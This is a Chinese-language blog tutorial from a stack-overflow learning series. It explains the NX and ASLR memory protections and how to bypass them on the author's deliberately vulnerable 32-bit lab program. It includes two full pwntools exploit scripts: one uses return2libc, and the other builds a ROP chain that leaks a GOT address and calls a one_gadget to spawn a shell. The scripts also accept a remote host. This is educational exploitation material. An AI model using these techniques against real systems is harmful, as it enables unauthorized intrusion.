栈溢出学习(五)之NX,ASLR绕过方法

最新推荐文章于 2022-04-16 18:09:07 发布
最新推荐文章于 2022-04-16 18:09:07 发布
阅读量3.7k 收藏 19
点赞数 2
分类专栏: 【pwn】 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35544379/article/details/105156252
版权

前言

栈溢出学习(五)之NX,ASLR绕过方法,讲述NX,ASLR保护机制及其绕过方法

样例代码

本文使用的代码如下

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * compiled with:
 *  gcc    -O0     -fno-stack-protector    -no-pie     -z execstack      -m32   -g  -o lab0 lab0.c
          优化等级      关闭canary         关闭地址随机化   关闭NX      生成32位程序

 */

void shell()//backdoor
{
        printf("You got it\n");
        system("/bin/sh");
}


void hello(char* name)
{
  char buf[20];
  strcpy(buf,name);
  puts("hello!!!");
  printf("i am  %s ",buf);
}

void main(int argc,char** argv)
{
  setbuf(stdin,NULL);
  setbuf(stdout,NULL);
  char buf[100];
  puts("*****************************************");
  puts("PWN,hello world!");
  gets(buf);
  hello(buf);

}

0x07 NX绕过方法

一、NX保护机制

NX即"NO X",堆栈不可执行保护。开启NX后,程序的栈空间没有执行权限,通过这个保护,可以阻止return2shellcode攻击,但是return2libc,ROP,Hijack GOT等攻击方法依然有效,即:

  • 阻止:return2shellcode
  • 绕过:除了return2shellcode均可

二、绕过

在这里我们使用简单一些的return2libc来绕过

程序编译选项为

gcc  -O0  -fno-stack-protector  -no-pie  -m32  -g  -o nxlab lab0.c

可以看到已开启NX
在这里插入图片描述
exp如下,原理参考 栈溢出学习(二)之 jmp esp & return2libc 即可

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date    : 2020-03-27 22:32:52
# @Author  : Pz_mstr
# @Version : python3
# @use     : exp for nx protect
from pwn import *
import sys

def trans(s):
	return "b'%s'" % ''.join('\\x%.2x' % x for x in s)

debug = True
binary = './nxlab'
libc_name = '/home/Pz_mstr/libc/libc2.23x86'

bin = ELF(binary)
libc = ELF(libc_name)

if len(sys.argv) > 1:
	# ip port
	io = remote(sys.argv[1],int(sys.argv[2]))
else:
	#io = process([binary],env={'LD_PRELOAD':libc_name})
	io = process(binary)

if debug:
	context.log_level = 'debug'

io.recvuntil('world!')

padding = b'a'*32
system_addr = bin.sym["system"]
bin_sh_addr = next(libc_name.search('/bin/sh\x00'))


payload = padding
payload += p32(system_addr)	
payload += p32(0xdeadbeef)	
payload += p32(bin_sh_addr)

io.sendline(payload)
io.interactive()

成功截图如下
在这里插入图片描述

0x08 ASLR绕过方法

一、ASLR保护机制

ASLR,即地址随机化。启用该机制后,堆,栈、共享库映射等线性区布局会被随机化,每次执行程序,这些区域的地址都与上次不同,增加了攻击者预测目的地址的难度。但是。他的问题在于,ASLR并不对所有模块和内存区进行随机化,比如GOT表的地址是不变的,那么我们可以分析出来他能够阻止的攻击方法和绕过方式

  • 阻止:return2shellcodereturn2libc
  • 绕过:利用GOT表泄露函数真实加载地址,根据libc的偏移算出我们需要的目标函数所在的真实地址,最终利用真实的地址实现return2libc

总的来说,绕过方法是hijack got结合return2libc完成。我们可以通过ropchain来完成这一系列攻击

二、绕过

编译选项如下,同样的把NX保护也开启

gcc -O0  -fno-stack-protector  -no-pie  -m32   -g  -o ASLRlab lab0.c
在管理员权限下,执行
echo 2 >/proc/sys/kernel/randomize_va_space

可以看到,ASLR和NX保护均已开启
在这里插入图片描述
在这里插入图片描述
绕过思路:
首先考虑绕过条件:

  • 泄露出某个函数的真实地址,因此需要一个打印/输出函数

就这一个条件,显然我们需要的输出函数就是puts,那么我们的栈空间可以这样布局

  1. 绿色部分完成对printf函数真实地址的泄露
  2. 黄色部分完成对printf函数真实地址的改写,改为system地址
  3. 橙色部分调用system("/bin/sh")
    在这里插入图片描述

不过细心的读者会发现,其实上面的栈空间布局是错的,因为开启了ASLR,你没办法提前获取到/bin/sh的地址,需要通过计算偏移求出,因此我们考虑使用one_gadget一把梭。

one_gadget的效果大概就是在libc中找到可以直接调用,能够产生system("/bin/sh")效果的一个gadget,因此只要把对printf函数真实地址的改写,改为one_gadget地址即可。

因此最终的栈空间布局为:
在这里插入图片描述

exp简单介绍

  1. 找一个ropgadget

pop_ret = 0x80483b9
在这里插入图片描述
3. 找一个one_gadget,可以一个一个试,这次选用的是0x5fbc5

在这里插入图片描述
4. 找libc中__libc_start_main的地址,为0x00018540

这里解释一下为什么找的是__libc_start_main,见下图是got表的布局。当我们使用puts(printf@got)打印printf@got的地址时,puts函数会一直输出直到遇到’\0x0a’,因此会把printf__libc_start_main的地址打印出来。

而我们exp(见下方)中接受泄露地址的代码是这样写的:

io.recvuntil('\n')
libc_addr = u32(io.recvuntil('\n')[-5:-1])

因此接收到的就是__libc_start_main@got,所以需要找libc中__libc_start_main的地址
在这里插入图片描述

最终exp如下

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date    : 2020-03-27 22:32:52
# @Author  : Pz_mstr
# @Version : python3
# @use     : exp for ASLR protect
from pwn import *
import sys

def trans(s):
	return "b'%s'" % ''.join('\\x%.2x' % x for x in s)

debug = True
binary = './ASLRlab'
#libc_name = '/home/Pz_mstr/libc/libc2.23x86'

bin = ELF(binary)
#libc = ELF(libc_name)

if len(sys.argv) > 1:
	# ip port
	io = remote(sys.argv[1],int(sys.argv[2]))
else:
	#io = process([binary],env={'LD_PRELOAD':libc_name})
	io = process(binary)

if debug:
	context.log_level = 'debug'

#gdb.attach(io)
#input()
io.recvuntil('world!\n')

padding = b'a'*32
puts_plt = bin.plt['puts']
gets_plt = bin.plt['gets']
printf_plt = bin.plt['printf']
printf_got = bin.got['printf']
pop_ret = 0x80483b9
one = 0x5f065

rop = padding
rop += p32(puts_plt) + p32(pop_ret) + p32(printf_got)
rop += p32(gets_plt) + p32(pop_ret) + p32(printf_got)
rop += p32(printf_plt)

io.sendline(rop)

io.recvuntil('\n')
libc_addr = u32(io.recvuntil('\n')[-5:-1])
print(libc_addr)
libc_base =  libc_addr - 0x00018540

io.sendline(p32(libc_base+one))
io.interactive()

总结

展示了两种分别绕过NX和ASLR的方法

  • return2libc绕过NX
  • ROPchain结合Hijack GOT绕过ASLR
Pz_mstr
关注
  • 2
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
二进制安全NX绕过方法--ROP技术
Hvnt3r的博客
03-06 2704
二进制安全NX绕过方法–ROP技术 原文地址 在之前的缓冲区溢出的实验中,溢出到栈中的shellcode可以直接被系统执行,给系统安全带来了极大的风险,因此NX技术应运而生,该技术是一种在CPU上实现的安全技术,将数据和命令进行了区分,被标记为数据的内存页没有执行权限,因此即使将恶意shellcode写入到执行流程中也会因缺少执行权限而利用失败,在一定程度上提高了系统的安全性,但是所有安全都是绝...
NX防护机制以及最基本shellcode
小王的储物间
02-08 879
NX的基本原理是将数据所在内存页(用户栈中)标识为不可执行,当程序溢出成功转入shellcode时,程序会尝试在数据页面上执行指令,此时CPU就会抛出异常,而不是去执行恶意指令.如图所示,该程序的栈空间没有可执行x权限,所以无法执行任何代码。道理我们都懂,那么如果我们关闭了NX到底可以干什么呢,该如何利用呢?下面通过一个实验来说明。1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。
PWN基础13:Ret2Syscall 突破 NX保护
prettyX的博客
07-15 725
问题背景 ret2text漏洞利用,是依赖于程序中存在system("/bin/sh")的函数,如果在程序本身中没有调用这个函数,那怎么办呢? 我们的解决办法是使用ret2shellcode,自定义shellcode代码,但是这种方法的局限性是需要程序没有开启NX保护,那如果程序开了NX保护呢,又该如何呢? 让我们一起来学习Ret2Syscall 基础知识 1、Gadgets:是指在程序中的指令片段,有时为了达到执行命令的目的,需要多个Gadget来完成我们的功能。Gadget最后一般都有ret指
NX,Canary,RELRO,PIE,Linux的4种保护机制讲解
半岛铁盒的博客
12-18 5257
NX(DEP):数据执行防护  Canary(FS):栈溢出保护  RELRO(ASLR):(地址随机化)  PIE(代码地址随机化) NX: 栈上的数据没有执行权限 防止攻击手段:栈溢出 + 跳到栈上执行shellcode CANARY: 在函数开始时就随机产生一个值,将这个值CANARY 放到栈上紧挨ebp的上一个位置,当攻击者想通过缓冲 区溢出覆盖ebp或者ebp下方的返回地址时,一定会覆 盖掉CANARY的值;当程序结束时,程序会检查 CANARY这个值和之前的是否一致,如果不一致,则
【PWN学习】ELF保护机制
Morphy_Amo的博客
12-27 2919
文章目录NX防御机制绕过方法编译参数Canary防御机制绕过方法编译参数RELRO防御机制ASLR防御机制绕过方法PIE防御机制绕过方法Reference NX 防御机制 NX在windows中称为DEP。开启NX保护的程序中不能直接使用shellcode执行任意任意代码。 栈溢出的核心在于修改了EIP的值,是程序跳转到shellcode上,从而远程执行命令。在利用的时候需要先写入一段获取shell的代码,然后在执行这一段代码,这就要求存储shellcode的内存区域需要同时拥有写入和执行的权限。而NX的保
SEEDLAB漏洞分析Lab6缓冲区溢出2-绕开ASLR进行攻击
weixin_52590050的博客
04-16 3048
SEEDLAB漏洞挖掘Lab6缓冲区溢出2 SEEDLAB漏洞挖掘Lab6缓冲区溢出2 Task1:stackesp.c 我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博客: 全新的界面设计 ,将会带来全新的写作体验; 在创作中心设置你喜爱的代码高亮样式,Markdown 将代码片显示选择的高亮样式 进行展示; 增加了 图片拖拽 功能,你可以将本地的图片直接拖拽到编辑区域直接展示; 全新的 KaTeX数学公式 语法;
二进制漏洞挖掘-栈溢出-开启NX开启ASLR1
08-04
在本篇文章中,我们将探讨一种常见的漏洞类型——栈溢出,并结合NX(No eXecute)和ASLR(Address Space Layout Randomization)两种安全机制的开启来分析其影响。 栈溢出漏洞通常发生在程序处理栈上的缓冲区时,由于...
二进制漏洞挖掘-栈溢出-开启NX未开启ASLR1
08-04
总结来说,栈溢出漏洞的利用在开启NX的系统中更具挑战性,但通过ret2libc策略,攻击者仍然可以绕过这一防护。在没有ASLR的情况下,内存地址是可预测的,使得漏洞利用变得更加直接。然而,现代操作系统通常会同时启用...
binary_vulnerability:二进制突破之栈溢出原理和利用技术,绕过安全保护技术(绕过NXASLR,PIE,Canary,RELRO等),格式化串行突破原理是利用技术,大量溢出漏洞原理和利用技术,glibc2 .30内存管理二进制文件深入分析,堆迭扩展(fastbin攻击,UAF,双重释放,堆重叠和扩展攻击,unlink攻击,house系列攻击)突破原理和攻破技巧
03-23
该项目版权尽属于我个人所有,这包括项目中的文档和源码,你可以下载和查看,该项目涉及的所有文档和代码仅能进行学习交流目的,但不能以下用途否则必究: 1,相关项目和文档不能被发布到网上或其他地方 2,不能...
栈溢出基础——ROP1.0的例题
07-13
不过,即使有NX保护,一些技巧如JOP(Jump-Oriented Programming)或SOP(System Call-Oriented Programming)仍可能被用来绕过它。 总之,了解栈溢出和ROP技术对于网络安全研究和防护至关重要。通过解决“ROP1.0”...
pwn栈溢出10道练习题有writeup
01-04
在这种情况下,攻击者会利用栈上已存在的小片段(gadgets)构造逻辑,通过ROP绕过这些防护。 4. **格式字符串漏洞**:特定函数如`printf`和`scanf`允许使用格式化字符串,如果用户输入不受限制,可以导致栈溢出。...
CTF PWN绕过ASLRNX的三种利用方式
蚁景网安学院
09-04 988
author:giantbranch作者简介:考上大学因为分数不算太好,被分配到了信息安全专业,一开始只是随便跟着学,后来一个偶然的机会跟着一个校园团队去搞web开发,微信开发去了,也挺...
栈溢出基本ROP绕过ASLRNX保护
ditto的博客
12-28 3512
菜鸡刚学rop,总结下,算是对蒸米大佬这篇文章最后一个样例的一点解释说明。 笔记中的程序源代码来自 蒸米大佬的x86一步一步学rop http://www.vuln.cn/6645 计算溢出点的位置的脚本可以在大佬的github上下载(其实从IDA上也可以计算出来溢出点) https://github.com/zhengmin1989/ROP_STEP_BY_STEP 预备知识: 了解动态链接中P...
Linux (x86) Exploit 开发系列教程之八 绕过 ASLR -- 第三部分
热门推荐
龙哥盟
05-01 4万+
绕过 ASLR – 第三部分 译者:飞龙 原文:Bypassing ASLR – Part III 预备条件: 经典的基于栈的溢出 绕过 ASLR – 第一部分 VM 配置:Ubuntu 12.04 (x86)在这篇文章中,让我们看看如何使用 GOT 覆盖和解引用技巧。来绕过共享库地址随机化。我们在第一部分中提到过,即使可执行文件没有所需的 PLT 桩代码,攻击者也可以使用 GOT 覆盖和解引用技巧
linux溢出总结+windows aslr地址随机化绕过
sunno_ya
05-06 5376
实验一 Linux下缓冲区溢出 通过缓冲区溢出漏洞执行自己的代码 【实验代码】 【实验目的】 通过缓冲区溢出,使其执行not_called函数。 【实验原理及结果】 (1)编译程序(关闭掉栈保护): (2)gdb调试程序 查看vulnerable_function函数汇编代码 我们可以看到该函数开辟了一个0x6c大小的缓冲区 | argument
常见linux攻击技术之绕过NX实现栈溢出攻击
parker的专栏
04-15 7990
0x00 前言 众所周知,linux下开启了NX的以及windows下开启了DEP的程序堆栈是不可执行的,linux下的程序默认编译时是开启了NX的,故很久以前采用的通过jmp esp或者jmp rsp跳板技术跳转到栈中的shellcode执行的栈溢出攻击方式基本上已经失效。 除了NX,还有ASLR,PIE,CANARY,FORTIFY,RELRO等各类保护手段花八门,大大的提高了linux
Ret2Syscall绕过NXASLR保护
X丶 的博客
11-20 1504
Ret2Syscall,即控制程序执行系统调用,进而获取shell。 下面看看我们的vuln程序。 可以看出,程序中的gets有明显的 溢出漏洞 用gdb打开, 检查一下文件开启了哪些防护: 可以看出程序开启了 NX(栈不可执行)防护,那么,我们可以用ROP绕过防护 接来下,我们利用溢出漏洞来控制程序执行syscall(系统调用) 有关syscall系统调用的信息,可以在...
ROP 绕过 NX 技术--pwntools--shellcode 资料 入门基础
qq_43613772的博客
07-25 890
最近做pwn频繁地遇到开启了 NX 保护的二进制程序,绕过 NX 保护最常用的方法就是 ROP。网络上关于 ROP 的原理和 CTF 这类题目的文章较多,但是这些文章要不就是给出了一堆代码,要不只是单纯地讲解 CTF 题目和 ROP 原理(写的还不详细),也缺乏系统性地讲解这类 CTF 题目的解题步骤,这通常会阻碍初学者的学习步伐和热情。 函数调用约定 函数的调用约定就是描述参数是怎么传递和由谁平...
透过 checksec 学习 Linux 防溢出攻击保护措施
CHOOOU的博客
11-13 2008
最近用到了 checksec,想整理整理一些 Linux 防溢出的保护措施,因为容易弄混。。 Checksec是一个bash脚本,用于检查可执行文件的属性(如PIE,RELRO,PaX,Canaries,ASLR,Fortify Source),例如: USER@NAME:~# checksec a [*] '/a' Arch: i386-32-little RELRO: ...
vs2022-栈溢出
最新发布
10-30
栈溢出是一种常见的安全漏洞,它通常发生在程序试图向栈中写入超过其分配的内存空间的数据时。攻击者可以利用这种漏洞来覆盖返回地址,从而控制程序的执行流程。在VS2022中,可以通过以下几个步骤来防止栈溢出漏洞的发生: 1. 使用安全函数:VS2022提供了一些安全函数,如strcpy_s、strcat_s等,这些函数可以检查缓冲区的大小,从而避免缓冲区溢出。 2. 使用编译器选项:VS2022提供了一些编译器选项,如/GS、/RTC等,这些选项可以在编译时检查缓冲区溢出。 3. 使用堆栈保护:VS2022提供了一种叫做堆栈保护的机制,它可以在栈帧中添加一个特殊的值,从而检测栈溢出漏洞的发生。 引用中提到了两个利用方式,一种是利用pop xxx指令,另一种是利用ret指令。这两种方式都可以用来构造ROP链,从而绕过ASLR和DEP等安全机制,实现攻击者的恶意目的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值